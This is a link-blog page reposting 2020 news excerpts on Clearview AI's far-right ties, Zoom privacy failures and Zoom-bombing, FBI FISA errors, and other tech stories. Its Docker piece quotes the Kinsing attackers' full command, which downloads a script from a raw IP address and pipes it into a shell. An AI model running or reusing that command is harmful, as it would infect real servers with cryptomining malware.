The Linkielist

Linking ideas with the world

The Linkielist

Creepy Face Recognition Firm Clearview AI Sure Has a Lot of Ties to the Far Right – the extremist kinds of far right

Clearview AI, the dystopian face recognition company that claims to have amassed a database of billions of photos, signed contracts with hundreds of law enforcement agencies, and shopped its app around to the rich and powerful, has extensive links to the far right, according to a Huffington Post investigation. In fact, one of its associates claimed to have been working on a face recognition product explicitly designed to be useful for mass deportations.

Founder Hoan Ton-That’s has links to the far-right movement that move right past suspicious into obvious, according to HuffPo. He reportedly attended a 2016 dinner with white supremacist Richard Spencer and organized by alt-right financier Jeff Giesea, an associate of Palantir founder and Trump-supporting billionaire Peter Thiel. (Thiel secretly bankrolled a lawsuit that bankrupted Gizmodo’s former parent company, Gawker Media.) Ton-That was also a member of a Slack channel run by professional troll Chuck Johnson for his now-defunct WeSearchr, a crowdfunding platform primarily used by white supremacists; that channel included people like the webmaster of neo-Nazi site Daily Stormer, Andrew Auernheimer, and conspiracy theorist Mike Cernovich,

Per HuffPo, in January 2017 Johnson posted on Facebook that he was working on “building algorithms to ID all the illegal immigrants for the deportation squads.” Another source told HuffPo that they had seen him bragging about that work to “a whole bunch of really important people” at Trump’s DC hotel that spring, introducing them to a man the source identified as almost certainly being Ton-That.

Johnson, who was involved with Trump’s transition team, also hit up then-Breitbart employee Katie McHugh, who at that time was a white supremacist but has since left the movement. McHugh told HuffPo that Johnson asked to be put in contact with ghoulish Trump adviser Stephen Miller so he could tout a “way to identify every illegal alien in the country.” (It’s unclear whether that happened, but Clearview’s clients include Immigration and Customs Enforcement and the FBI.) That same year, Thiel invested $200,000 in Clearview.

Smartcheckr’s labor pool also included many ethnonationalists who believe in purging the U.S. of nonwhites, according to HuffPo. One of those was hardcore racist and Johnson associate Tyler Bass, who described himself as an “investigator” doing “remote software testing” for the app and whose LinkedIn posts suggest may have had access to law enforcement data associated with criminal investigations as late as 2018. Bass also claimed to McHugh to have been in attendance at a disastrous far-right rally in Charlottesville, Virginia in 2017, where a neo-Nazi terror attack killed protester Heather Heyer and wounded scores of others.

Another was Douglass Mackey, the overseer of a vast online racist propaganda operation under the moniker “Ricky Vaughn,” had a role as a contract consultant for Smartcheckr. While there, he touted the use of its face recognition tools to anti-Semitic congressional candidate Paul Nehlen for extreme campaign opposition research. (Ton-That told HuffPo that Mackey was only a contractor for three weeks and his offer to Nehlen was unauthorized, though Smartcheckr employees took steps to distance themselves from Mackey after he was outed as “Ricky Vaughn” in 2018.)

There was also Marko Jukic, HuffPo wrote, a Clearview AI employee who marketed its products to police departments and had a history as a prolific contributor to extremist blogs, including a post where he advocated “segregation and separation” of Jews. One of Clearview’s lawyers, Tor Ekeland, is best known for representing far-right provocateurs and racists like Auernheimer.

Johnson appears to have had access to WeSearchr until at least January 2020, when he showed a fellow passenger on a flight to Boston a powerful face recognition app on his phone, according to a BuzzFeed report. In a statement to HuffPo, Ton-That denied that Johnson was an “executive, employee, consultant” or board member of Clearview, though he didn’t clarify whether Johnson holds equity in the company. He also told the site that Clearview has severed ties with Bass and Jukic, claiming he was “shocked by and completely unaware of Marko Jukic’s online writings under a different name.” (Jukic used the same pseudonym to talk with Ton-That on Slack and email that he did in his racist blog posts, HuffPo noted.)

Ton-That also told the site that he grew up on the internet, which “not always served me well” during his upbringing, ad“There was a period when I explored a range of ideas—not out of belief in any of them, but out of a desire to search for self and place in the world. I have finally found it, and the mission to help make America a safer place. To those who have read my words in the Huffington Post article, I deeply apologize for them.”

Clearview built its face recognition database by scraping photos en masse from public social media posts, a practice that is technically legal but could expose it to significant civil liability from rights holders. While scraping is legal, Clearview’s business practices have resulted in cease-and-desists from Silicon Valley giants like Google, and may have run afoul of other laws. The state attorney general of Vermont filed a lawsuit against the company last month alleging violations of the Vermont Consumer Protection Act and a state data broker law, while the AG of New Jersey ordered all police in the state to stop using Clearview products. Canadian privacy commissioners are investigating the company; it is also facing two class action lawsuits, one of which alleges that the company violated Illinois biometrics laws.

Source: Creepy Face Recognition Firm Clearview AI Sure Has a Lot of Ties to the Far Right

If you don’t cover your Docker daemon API port you’ll have a hell of a time… because cryptocreeps are hunting for it

Some Docker installations are getting hammered by malware skiddies hoping to mine digital cash using other people’s CPU time.

Infosec outfit Aqua – no, not the Barbie Girl band – said miscreants have spotted that a decent number of Docker deployments are lazily or inadvertently exposing the daemon API port to the public internet with no protection. It’s a fairly common error that hackers have exploited in the past to mine digital coins, although lately we’re told there have been thousands of infection attempts daily via this interface, all involving a piece of Linux malware dubbed Kinsing.

“These are the highest numbers we’ve seen in some time, far exceeding what we have witnessed to date,” noted researcher Gal Singer this week.

“We therefore believe that these attacks are directed by actors with sufficient resources and the infrastructure needed to carry out and sustain such attacks, and that this is not an improvised endeavor.”

If an open system is found, the attacker tells it to create and run a custom Ubuntu container that executes the following command:

/bin/bash -c apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 142.44.191.122/d.sh | sh;tail -f /dev/null

The fetched d.sh script disables SELINUX security protections, as well as searches out and removes any other malware or cryptomining containers already running on the infected machine. That way it won’t have to compete for CPU time. It uses crontab to ensure it stays running every minute, and a bunch of other stuff: it’s 600 lines long.

The script also downloads the Kinsing malware proper, and runs it. This software nasty tries to make contact with one of four command and control servers in Eastern Europe for any special orders to carry out on the infected system. It also runs a script, called spre.sh, that uses any SSH keys it finds to log into and spread to other machines to run its code.

“The spre.sh shell script that the malware downloads is used to laterally spread the malware across the container network,” Aqua’s Singer said.

“In order to discover potential targets and locate the information it needs to authenticate against, the script passively collects data from /.ssh/config, .bash_history, /.ssh/known_hosts, and the likes. We did not identify any active scanning techniques used to identify additional targets.”

Once that is done, the mining component of the malware is finally executed.

Kinsing malware diagram

A diagram of the attack process
click to enlarge

The Register has pinged Docker for comment on the attacks. In the meantime, Singer and Aqua recommend blocking the IP addresses linked to this outbreak. It’s also highly recommended you don’t leave the daemon API port facing the internet, and use policies and configurations to limit what systems are allowed to talk to the interface.

“Identify all cloud resources and group them by some logical structure,” said the team. “Review authorization and authentication policies, basic security policies, and adjust them according to the principle of least privilege. Investigate logs, mostly around user actions, look for actions you can’t account for anomalies.” ®

Source: If you don’t cover your Docker daemon API port you’ll have a hell of a time… because cryptocreeps are hunting for it • The Register

Facebook asks users about coronavirus symptoms, releases friendship data to researchers

Facebook Inc said on Monday it would start surveying some U.S. users about their health as part of a Carnegie Mellon University research project aimed at generating “heat maps” of self-reported coronavirus infections.

The social media giant will display a link at the top of users’ News Feeds directing them to the survey, which the researchers say will help them predict where medical resources are needed. Facebook said it may make surveys available to users in other countries too, if the approach is successful.

Alphabet Inc’s Google, Facebook’s rival in mobile advertising, began querying users for the Carnegie Mellon project last month through its Opinion Rewards app, which exchanges responses to surveys from Google and its clients for app store credit.

Facebook said in a blog post that the Carnegie Mellon researchers “won’t share individual survey responses with Facebook, and Facebook won’t share information about who you are with the researchers.”

The company also said it would begin making new categories of data available to epidemiologists through its Disease Prevention Maps program, which is sharing aggregated location data with partners in 40 countries working on COVID-19 response.

Researchers use the data to provide daily updates on how people are moving around in different areas to authorities in those countries, along with officials in a handful of U.S. cities and states.

In addition to location data, the company will begin making available a “social connectedness index” showing the probability that people in different locations are Facebook friends, aggregated at the zip code level.

Laura McGorman, who runs Facebook’s Data for Good program, said the index could be used to assess the economic impact of the new coronavirus, revealing which communities are most likely to get help from neighboring areas and others that may need more targeted support.

New “co-location maps” can similarly reveal the probability that people in one area will come in contact with people in another, Facebook said.

Source: Facebook asks users about coronavirus symptoms, releases friendship data to researchers – Reuters

This might actually be a good way to use all that privacy invading data

Chinas Winnti group stayed under the radar for a decade by aiming for Linux servers

A group of hackers operating as an offshoot of China’s Winnti group managed to stay undetected for more than a decade by going open source.

A report from BlackBerry outlines how the group, actually a collection of five smaller crews of hackers thought to be state-sponsored, assembled in the wake of Winnti and exploited Linux servers, plus the occasional Windows Server box and mobile device, for years.

“The APT groups examined in this report have traditionally pursued different objectives and focused on a wide array of targets,” BlackBerry noted.

“However, it was observed that there is a significant degree of coordination between these groups, particularly where targeting of Linux platforms is concerned, and it is assessed that any organization with a large Linux distribution should not assume they are outside of the target sets for any of these groups.”

First chronicled by researchers back in 2013, the Winnti hacking operation is thought to date back as far as 2009. These groups, described by BlackBerry as “offshoots” of that hacking outfit, have been around for nearly as long and use similar tactics.

Part of the reason the attack has gone unnoticed for so long, BlackBerry reckons, is due to their preference for Linux servers. It is believed the hackers use three different backdoors, two rootkits, and two other build tools that can be used to construct additional rootkits on a per-target basis for open-source servers.

This in addition to the command-and-control tools and what is described as a “massive botnet” of compromised Linux servers and devices. Some of the malware has been in use dating back to 2012.

Source: Want to stay under the radar for a decade or more? This Chinese hacking crew did it… by aiming for Linux servers • The Register

American schools are banning Zoom and switching to Microsoft Teams

After many schools adopted Zoom to conduct online lessons during the coronavirus lockdown, concerns about security and privacy have led to a ban on the video conferencing software across the US.

The chancellor of New York City’s Department of Education Richard A Carranza sent an email to school principals telling them to “cease using Zoom as soon as possible”. And he is not alone; schools in other parts of the country have taken similar action, and educators are now being trained to use Microsoft Teams as this has been suggested as a suitable alternative, partly because it is compliant with FERPA (Family Educational Rights and Privacy Act).

See also:

Large numbers of teachers spent time learning how to use Zoom to continue educating pupils who are confined to their homes. But growing criticism of Zoom for its approach to privacy and security has given cause for a rethink. Documents seen by Chalkbeat show that principals in NYC have been told: “Based on the DOE’s review of those documented concerns, the DOE will no longer permit the use of Zoom at this time”.

The Washington Post quotes Danielle Filson, spokesperson for the NYC Education Department, as saying:

Providing a safe and secure remote learning experience for our students is essential, and upon further review of security concerns, schools should move away from using Zoom as soon as possible. There are many new components to remote learning, and we are making real-time decisions in the best interest of our staff and student. We will support staff and students in transitioning to different platforms such as Microsoft Teams that have the same capabilities with appropriate security measures in place.

The Post also reports that Clark County Public Schools in Nevada were also moving away from Zoom, saying in a statement that the decision had been taken to ” disable access to Zoom out of an abundance of caution due to instances of hacking that created unsafe environments for teachers and students”.

Schools in Utah, Washington state and beyond are also looking into Zoom alternatives.

Source: American schools are banning Zoom and switching to Microsoft Teams

Dr. Drew Pinsky Played Down COVID-19, Then Tries To DMCA Away The Evidence

Update: The full video is now back up and it’s even worse than the original clip we posted. It’s unclear if it went back up thanks to YouTube deciding it was fair use, or Pinsky removing the bogus takedown. Either way, watch it here:

Copyright system supporters keep insisting to me that copyright is never used for censorship, and yet over and over again we keep seeing examples that prove that wrong. The latest is Dr. Drew Pinsky, the somewhat infamous doctor and media personality, who has been one of the more vocal people in the media playing down the impact of the coronavirus. In a video that had gone viral on Twitter and YouTube, it showed many, many, many clips of Dr. Drew insisting that COVID-19 was similar to the flu, and that it wouldn’t be that bad. Assuming it hasn’t been taken down due to a bogus copyright claim, you can hopefully see it below:

As you can see, for well over a month, deep into March when it was blatantly obvious how serious COVID-19 was, he was playing down the threat. Beyond incorrectly comparing it to the flu (saying that it’s “way less virulent than the flu” on February 4th — by which time it was clearly way more virulent than the flu in China), he said the headlines should say “way less serious than influenza,” he insisted that the lethality rate was probably around “0.02%” rather than the 2% being reported. On February 7th, he said your probability of “dying from coronavirus — much higher being hit by an asteroid.” He also mocked government officials for telling people to stay home, even at one point in March saying he was “angry” about a “press-induced panic.” On March 16th, the same day that the Bay Area in California shut down, he insisted that if you’re under 65 you have nothing to worry about, saying “it’s just like the flu.” This was not in the distant past. At one point, a caller to his show, again on March 16th, said that because it’s called COVID-19 that means there were at least 18 others of them, and that’s why no one should worry — and Drew appeared to agree, making it appear he didn’t even know that the 19 refers to the year not the number of coronaviruses, and even though there are other coronaviruses out there, this one was way more infectious and deadly, so it doesn’t matter.

To give him a tiny bit of credit, on Saturday, Pinsky posted a series of choppy videos on Twitter in which he flat out said that he was wrong and he was sorry for his earlier statements, and said that he regretted his earlier statements. He also claimed that he signed up to help in California and NY if he was needed. But, even that apology seems weak in the face of what else he said in those videos… and, more importantly, his actions. In terms of what he said, he kept saying that he always said to listen to Dr. Fauci and to listen to your public health officials. Amazingly, at one point in his apology video, he insists that he thinks the real reason why New York got hit so bad is because of hallways and trains. Yet, in the video above, at one point he literally mocks NYC Mayor de Blasio for telling people to avoid crowded trains, saying: “de Blasio told them not to ride the trains! So they’re not riding the trains! So I am! [guffaw] I mean, it’s ridiculous.”

Given that, it’s a bit difficult to take him seriously when he claims that all along he always said to listen to your public officials, when just a few weeks ago he was mocking them. Indeed, as multiple people have pointed out, the issue here isn’t so much that Pinsky was wrong — in the early days, when there wasn’t as much info, lots of people got things wrong about COVID-19 (though Pinsky kept it up way way after most others recognized how serious it was), but that he acted so totally sure about his opinions that this was nothing to worry about. It was the certainty with which he said what he said that was so much of the problem, including deep into it already being a pandemic with local officials warning people to stay home.

But, even worse, just as he was doing the right thing and mostly apologizing… he was trying to hide those earlier clips that made him look so, so, so bad. His organization began sending out DMCA notices. If you went to the original YouTube upload you got this:

That says: “This video is no longer available due to a copyright claim by Drew Pinsky Inc.” Now, some might argue that it was just some clueless staffer working for Dr. Drew sending off bogus DMCAs, or maybe an automated bot… but nope. Drew himself started tweeting nonsense about copyright law at people. I originally linked to that tweet, but sometime on Sunday, after thousands of people — including some of the most famous lawyers in the country — explained to him why it was nonsense, he deleted it. But I kept a screenshot:

That says, amazingly:

Infringing copywrite laws is a crime. Hang onto your retweets. Or erase to be safe.

The wrongness-to-words ratio in that tweet is pretty fucking astounding. First of all, the layup: it’s copyright, Drew, not copywrite. Make sure you know the name of the fucking law you’re abusing to censor someone before tossing it out there. Second, no, infringing copyright is not a crime. Yes, there is such a thing as criminal copyright infringement, but this ain’t it. Someone posting a video of you would be, at best, civil infringement. For it to be criminal, someone would have to be making copies for profit — like running a bootleg DVD factory or something. Someone posting a 2 minute clip of your nonsense is not that.

Most important, however, this isn’t even civil infringement, thanks to fair use. Putting up a 2 minute video showing a dozen or so clips of Drew making an ass of himself is not infringing. It’s classic fair use — especially given the topic at hand.

So it’s really difficult to believe that Drew is really owning up to his mistakes when at the same time he says he’s sorry, he’s actively working to abuse the law to try to silence people from highlighting his previous comments. Also, someone should point him to Lenz v. Universal in which a court said that before sending a takedown, you need to take fair use into consideration. It certainly appears that Drew hasn’t the foggiest idea how copyright law works, so it seems unlikely he considered fair use at all.

I certainly understand that he likely regrets his earlier comments. And I appreciate his willingness to admit that he was wrong. But to really take ownership of your previous errors, you shouldn’t then be working doubletime to try to delete them from the internet and hide them from view. That’s not taking ownership of your mistakes, that’s trying to sweep them under the rug.

Source: Dr. Drew Pinsky Played Down COVID-19, Then Tries To DMCA Away The Evidence | Techdirt

For the past five years, every FBI secret spy court request to snoop on Americans has sucked, says watchdog

Analysis The FBI has not followed internal rules when applying to spy on US citizens for at least five years, according to an extraordinary report [PDF] by the Department of Justice’s inspector general.

The failure to follow so-called Woods Procedures, designed to make sure the FBI’s submissions for secret spying are correct, puts a question mark over more than 700 approved applications to intercept and log every phone call and email made by named individuals.

Under the current system, the Feds apply to the Foreign Intelligence Surveillance Court (FISC), which can then grant the investigative agency extraordinary spying powers. These can also be granted retroactively if the agency needs to move quickly.

Back in 2001, however, a number of FISA warrants were found to have been granted on unverified information, driving the creation of the Woods Procedures, named after the FBI official who drew them up, Michael Woods.

Following a review last year of one of those successful applications that targeted a Trump campaign staffer called Carter Page, the FBI was found to have made “fundamental and serious errors” in its application. Inspector general Michael Horowitz then expanded his review to another 29 applications dated from October 2014 to September 2019 out of a pool of over 700 and found the same problems in every single other case he looked at, pointing to a systemic problem.

As a result, more than five years’ worth of secret spying activities by the US government may be illegitimate. Horowitz found the same “basic and fundamental errors” in every application.

Unaccountable

The FISA Court has long been highlighted by critics as an unaccountable body with extraordinary powers. Except for very rare occasions, only one side – the government – can present its case to the judges and as a result the court has approved almost every application. The process is wide open to abuse, critics have argued, and so it turns out to have been the case.

The Woods Procedures include things like sufficient supporting documentation of any assertions, a second review of any facts and assertions, and a re-verification of facts whenever an extension is applied for. They are a check and balance on power.

“We do not have confidence that the FBI has executed its Woods Procedures in compliance with FBI policy,” the report states.

It says that it couldn’t review files for four of the 29 selected FISA applications because the FBI has not been able to locate them and, in three of these instances, did not know if the files ever existed.

All of the 25 applications reviewed had “inadequately supported facts,” and “FBI and NSD officials we interviewed indicated to us that there were no efforts by the FBI to use existing FBI and NSD oversight mechanisms.”

Ah yeah but it’s all fixed now

Somewhat amazingly, the FBI doesn’t dispute the findings. The inspector general provided his report to the FBI and prosecutors for their feedback, and appended their responses to the report.

Neither the Feds nor the Dept of Justice denies the assertion that the FBI has not followed its own rules. And both argue that recent proposed changes, prompted solely by the inspector general’s previous report and which critics assert do not go far enough, have effectively fixed the issues.

There is no mention in either response or in the inspector general’s report of what the implications are for the hundreds of people that have been subject to secret spying orders that allow federal agents to track everything that person does and says.

But then, there may not be any implications because under the FISA rules, the person subjected to the spying is not informed of the order against them, even when the spying is over. And they are not even entitled to know or see any evidence compiled against them as a result of the spying operation, even if they are charged as a result of the spying.

It is, in short, a sign that the FBI cannot be trusted to follow its own rules even when those rules apply to the most invasive powers it can be given

Source: For the past five years, every FBI secret spy court request to snoop on Americans has sucked, says watchdog • The Register

Amazon says it fired a guy for breaking pandemic rules. Same guy who organized a staff protest over a lack of coronavirus protection

On Monday, Amazon fired Chris Smalls, a worker at its Staten Island, New York, warehouse, who had organized a protest demanding more protection for workers amid the coronavirus outbreak.

Smalls, in a statement, said, “Amazon would rather fire workers than face up to its total failure to do what it should to keep us, our families, and our communities safe. I am outraged and disappointed but I am not shocked. As usual, Amazon would rather sweep a problem under the rug than act to keep workers and working communities safe.”

Amazon spokesperson Kristen Kish denied the firing had anything to do with protected labor activity. “We did not terminate Mr Smalls employment for organizing a 15-person protest,” she said in an emailed statement. “We terminated his employment for putting the health and safety of others at risk and violations of his terms of his employment.”

Strike organizers have disputed Amazon’s attendance figures, claiming about 50 people walked out.

Kish said Smalls had received multiple warnings for violating social distancing guidelines and had been asked to remain home with pay for two weeks because he had been in the proximity of another worker confirmed to have COVID-19. By ignoring that instruction and coming on-site, she said, he was putting colleagues at risk.

Concern about health safety has spread across Amazon’s workforce. Workers at Amazon’s Whole Foods grocery chain on Tuesday staged a sick-out, demanding 2x hazard pay for working in stores where they may be exposed to coronavirus.

The company last month boosted pay for Amazon and Whole Foods hourly employees in the US and Canada by $2 an hour and £2 per hour for employees in the UK during the month of April. And it said it would double its hourly base rate – ranging from $17.50 to $23/hour at JFK8, its Staten Island warehouse – for overtime from March 16, 2020 through May 3, 2020. The company has also offered two weeks of pay for workers quarantined for coronavirus.

Source: Amazon says it fired a guy for breaking pandemic rules. Same guy who organized a staff protest over a lack of coronavirus protection • The Register

A Feature on Zoom Secretly Displayed Data From People’s LinkedIn Profiles

But what many people may not know is that, until Thursday, a data-mining feature on Zoom allowed some participants to surreptitiously have access to LinkedIn profile data about other users — without Zoom asking for their permission during the meeting or even notifying them that someone else was snooping on them.

The undisclosed data mining adds to growing concerns about Zoom’s business practices at a moment when public schools, health providers, employers, fitness trainers, prime ministers and queer dance parties are embracing the platform.

An analysis by The New York Times found that when people signed in to a meeting, Zoom’s software automatically sent their names and email addresses to a company system it used to match them with their LinkedIn profiles.

The data-mining feature was available to Zoom users who subscribed to a LinkedIn service for sales prospecting, called LinkedIn Sales Navigator. Once a Zoom user enabled the feature, that person could quickly and covertly view LinkedIn profile data — like locations, employer names and job titles — for people in the Zoom meeting by clicking on a LinkedIn icon next to their names.

The system did not simply automate the manual process of one user looking up the name of another participant on LinkedIn during a Zoom meeting. In tests conducted last week, The Times found that even when a reporter signed in to a Zoom meeting under pseudonyms — “Anonymous” and “I am not here” — the data-mining tool was able to instantly match him to his LinkedIn profile. In doing so, Zoom disclosed the reporter’s real name to another user, overriding his efforts to keep it private.

Reporters also found that Zoom automatically sent participants’ personal information to its data-mining tool even when no one in a meeting had activated it. This week, for instance, as high school students in Colorado signed in to a mandatory video meeting for a class, Zoom readied the full names and email addresses of at least six students — and their teacher — for possible use by its LinkedIn profile-matching tool, according to a Times analysis of the data traffic that Zoom sent to a student’s account.

The discoveries about Zoom’s data-mining feature echo what users have learned about the surveillance practices of other popular tech platforms over the last few years. The video-meeting platform that has offered a welcome window on American resiliency during the coronavirus — providing a virtual peek into colleagues’ living rooms, classmates’ kitchens and friends’ birthday celebrations — can reveal more about its users than they may realize.

“People don’t know this is happening, and that’s just completely unfair and deceptive,” Josh Golin, the executive director of the Campaign for a Commercial-Free Childhood, a nonprofit group in Boston, said of the data-mining feature. He added that storing the personal details of schoolchildren for nonschool purposes, without alerting them or obtaining a parent’s permission, was particularly troubling.

Source: A Feature on Zoom Secretly Displayed Data From People’s LinkedIn Profiles – The New York Times

A hacker has wiped, defaced more than 15,000 Elasticsearch servers

For the past two weeks, a hacker has been breaking into Elasticsearch servers that have been left open on the internet without a password and attempting to wipe their content, while also leaving the name of a cyber-security firm behind, trying to divert blame.

According to security researcher John Wethington, one of the people who saw this campaign unfolding and who aided ZDNet in this report, the first intrusions began around March 24.

The attacks appear to be carried with the help of an automated script that scans the internet for ElasticSearch systems left unprotected, connects to the databases, attempts to wipe their content, and then creates a new empty index called nightlionsecurity.com.

The attacking script doesn’t appear to work in all instances, though, as the nightlionsecurity.com index is also present in databases where the content has been left intact.

However, on many Elasticsearch servers, the wiping behavior is obvious, as log entries simply cut off around recent dates, such as March 24, 25, 26, and so on. Due to the highly volatile nature of data stored inside Elasticsearch servers, it is hard to quantify the exact number of systems where data was deleted.

Night Lion Security denies any involvement

In a Signal conversation with this reporter yesterday, Vinny Troia, the founder of Night Lion Security, has denied that his company had anything to do with the ongoing attacks.

In an interview he gave DataBreaches.net on March 26, Troia said he believes the attack is being carried out by a hacker he has been tracking for the past years, and who is also the subject of a recently released book.

Source: A hacker has wiped, defaced more than 15,000 Elasticsearch servers | ZDNet

Zoom’s Flawed Encryption Linked to China

Meetings on Zoom, the increasingly popular video conferencing service, are encrypted using an algorithm with serious, well-known weaknesses, and sometimes using keys issued by servers in China, even when meeting participants are all in North America, according to researchers at the University of Toronto.

The researchers also found that Zoom protects video and audio content using a home-grown encryption scheme, that there is a vulnerability in Zoom’s “waiting room” feature, and that Zoom appears to have at least 700 employees in China spread across three subsidiaries. They conclude, in a report for the university’s Citizen Lab — widely followed in information security circles — that Zoom’s service is “not suited for secrets” and that it may be legally obligated to disclose encryption keys to Chinese authorities and “responsive to pressure” from them.

Source: Zoom’s Flawed Encryption Linked to China

Thousands of recorded Zoom Video Calls Left Exposed on Open Web

Thousands of personal Zoom videos have been left viewable on the open Web, highlighting the privacy risks to millions of Americans as they shift many of their personal interactions to video calls in an age of social distancing. From a report: Many of the videos appear to have been recorded through Zoom’s software and saved onto separate online storage space without a password. But because Zoom names every video recording in an identical way, a simple online search can reveal a long stream of videos that anyone can download and watch. Zoom videos are not recorded by default, though call hosts can choose to save them to Zoom servers or their own computers. There’s no indication that live-streamed videos or videos saved onto Zoom’s servers are publicly visible. But many participants in Zoom calls may be surprised to find their faces, voices and personal information exposed because a call host can record a large group call without participants’ consent.

Source: Thousands of Zoom Video Calls Left Exposed on Open Web – Slashdot

Zoom Bombings Started Off as Pranks. Now Someone Could End Up Dead

For those unaware, Zoom officially has a porn problem. The multibillion-dollar video messaging mainstay among employees at Johnson & Johnson and the Department of Homeland Security—not to mention a household name among currently house-bound citizens across the country—has been rocked by story after story of pranksters popping into video meetings with clips of graphic porn or Nazi memorabilia. None of Zoom’s clients, seemingly, are safe: These Zoom bombs have hit city council members and churches alike. They’ve hit Chipotle.

The idea of having our work-from-home happy hours disrupted by someone splicing in something porn-y or Hitler-y is disturbing, and that’s where it usually ends: annoyance, disgust, shock—which is ultimately the response that these posters are trying to incite. But a Gizmodo investigation into multiple Discord chatrooms dedicated to coordinating these attacks revealed that the practice has a far darker side that can leave victims scarred for life—or far worse.

Zoom-based “bombs” and “raids” are typically the forte of high and middle school students whose classes are now almost exclusively taking place on the platform. From last month onward, Zoom’s rolled out a series of changes specifically catering to the educators it has onboard, from lifting the 40-minute limit on free meetings internationally to partnering with Logitech to offer free cameras and headsets to teachers who might need them. This gesture of goodwill promptly blew up in the company’s face when these students quickly realized that the codes and passwords needed to access a given Zoom meeting could be freely shared, leading a select few to coordinate with other students nationwide to spearhead a wave of raids in classrooms across the country.

Illustration for article titled Zoom Bombings Started Off as Pranks. Now Someone Could End Up Dead
Screenshot: Gizmodo (Discord)

Teens, in general, have a thing for Discord, a popular chat platform, and Discord is where these raids are coordinated. The platform’s long track record of raids on every platform led it to wedge a statement into its community guidelines explicitly disavowing raids as a “form of harassment.” Now that those raids have hit Zoom, Discord’s been actively booting off some users that are particularly active in a given raid channel, while unceremoniously shutting those channels down left and right.

This crackdown, along with the shuttering of raid-based communities on Reddit like the creatively named r/zoomraids, means that a lot of these channels are hard to find, and that finding them isn’t a guarantee that it’ll exist the next day. Over the course of this story, Gizmodo joined about 15 raid channels—some racking up more than 800 members a pop. By the time you’re reading this, there are at most six left standing—and for the most part, they are hidden behind server names that don’t mention Zoom at all. Discord told Gizmodo in an email that it had removed more than 350 servers for Zoom bombing just this morning.

“This behavior violates Discord’s terms of service, and we strongly condemn it,” a spokesperson told Gizmodo in a statement. “Once we identify those servers engaging in this sort of activity, we quickly investigate and take action, including removing content, banning users and shutting down those servers.”

The bulk of these servers, overall, are made up of teens not only swapping Zoom links back and forth but overall just… being typical edgelord teens—joking about the Holocaust (ironically), using racial slurs (ironically), and sharing a ton of porn (ironically?). Less ironic, but just as dark, are the materials shared back and forth to make these campaigns a reality. Multiple channels that Gizmodo joined had created a roster of Google documents listing the Zoom codes of hundreds of support groups in the U.S., along with the days and times each one would meet. Similar documents were created to target meetings for other at-risk groups, like LGBTQ and trans teens.

The Wednesday meetings from the manifesto detailing nearly 200 meetings happening weekly nationwide. Zoom codes are censored.
The Wednesday meetings from the manifesto detailing nearly 200 meetings happening weekly nationwide. Zoom codes are censored.
Screenshot: Gizmodo (Discord)

Depending on who you ask, raids on recovery groups are either lame, funny, fucked, or some combination of the three. Each of the Discord channels had a list of rules seemingly tailored to throw admins off the scent of the channel’s true purpose. One server’s rulebook stated that its one goal was to “support our fellow students and adults through their hard day of work by surprising them in their online meetings.” Another server for raid planning included the rule, “DO NOT RAID I DO NOT CONDONE IT.”

In many of the channels, all Zoom calls are fair game, whether it’s a Narcotics Anonymous meeting or a kindergarten classroom. Rules aside, the only limit to what’s being shared is in the hands of the poster: Some think playing footage of the 2019 Christchurch Mosque shooting in the middle of an NA meeting is a bridge too far, while others don’t. Some think exposing 9- and 10-year-olds to hardcore porn is too shitty, while others think the line should be drawn at middle schoolers and above.

As one user put it, “this discord freakin showed porn to kindergardners but wont raid an narcotics [anonymous]? y’all soft.”

Illustration for article titled Zoom Bombings Started Off as Pranks. Now Someone Could End Up Dead
Screenshot: Gizmodo (Discord)

While Zoom’s yet to respond to our request for comment, the company is undoubtedly aware of its raiding problem. Late last month, it put out an official blog post about “keeping uninvited guests” out of Zoom meetings, which reminds users, “When you share your meeting link on social media or other public forums, that makes your event … extremely public. ANYONE with the link can join your meeting.”

Some of the channels Gizmodo joined did, indeed, set up scrapers and dedicated bots specifically to monitor a Zoom link shared on a given platform. But just as many used a much easier tool: Google search. As confirmed by Gizmodo, public-facing Zoom links share a specific string of characters that, when plugged into Google search (or “dorked,” in internet parlance), will turn up dozens of upcoming Zoom meetings. Trying the search term ourselves, we were able to pull links for Zooms dedicated to hot yoga, wine tasting, and legal advice—all in less than a minute—not to mention more than a few Zoom’s dedicated to parents and their kids.

Putting young children at risk of exposure to horrifying imagery comes up more frequently than you’d might think since Zoom’s teacher-friendly packages apply for preschool teachers as much as it does for college professors. And just like Zoom bombings aimed at high school classes, the reactions of these young children can be passed around in videos recorded by the bombers. In the barely 24 hours we spent joining more than a dozen channels, one video—which showed the confused reactions of second graders being exposed to graphic hardcore pornography in the middle of their class—was frequently shared.

For what should be obvious reasons, we didn’t join any of the many, many raids linked at any given time, so we can’t specify what other young children might be seeing. If we’re assuming the worst, then that means some kids on these video calls are being exposed to footage of decapitation or shootings from sites like Bestgore and LiveLeak, along with any porn scenario you can imagine. Assuming the best-case scenario, the porn’s still there, but the murders aren’t. In either case, kids are at risk: Psychologists have been telling us for years that exposing children to hardcore pornography bumps up the chance that they’ll both become either the victim of sexual assault or end up assaulting someone themselves. Children who see the types of horrific violence you’d find on any gore site can haunt them for the rest of their lives, leading to PTSD or drug abuse.

Illustration for article titled Zoom Bombings Started Off as Pranks. Now Someone Could End Up Dead
Screenshot: Gizmodo (Discord)

And when it comes to meetings involving drug abuse, the harm done by these kinds of bombings cannot be overstated. As one Business Insider employee—and Alcoholics Anonymous member—recently explained, the isolation that comes with coronavirus-mandated quarantines is incredibly dangerous for those struggling with addiction:

We are all in our separate homes. And that can be dangerous, because alcoholics are notorious for isolating, for withdrawing from social situations — sometimes with a bottle.

If you drink normally, you may be wondering, ‘Why not just drink — even if you have a problem? Right now, while locked down, who could that hurt?’ I can answer that. I drank myself into the emergency room years ago. I know many people who did. Do you think hospitals need that right now? Do you think healthcare workers need to deal with millions of people whose immune systems are severely compromised by binge drinking?

Illustration for article titled Zoom Bombings Started Off as Pranks. Now Someone Could End Up Dead
Screenshot: Gizmodo (Discord)

The risk of relapse doesn’t just come for alcoholics, but anyone with any addiction. As one recent Rolling Stone report detailed, these sorts of weekly meetings can turn into not only a place to discuss their road to recovery but also a place that feels safe to talk about their inarguably valid fears surrounding the current pandemic. When that support line is intercepted—by an edgy teen or otherwise—a recovering addict can lose that tenuous feeling of safety and withdraw from meetings with the support group keeping them clean.

Without that network, some folks fare well and others don’t, with relapse being a bigger risk to those earlier on in recovery, as the Business Insider report explains. For some addictions—like opioids, a relapse can turn deadly shockingly fast. As pointed out by the Centers for Disease Control in 2018, some 70 percent of the tens of thousands of annual drug overdoses in the U.S. happen because of opiate addiction.

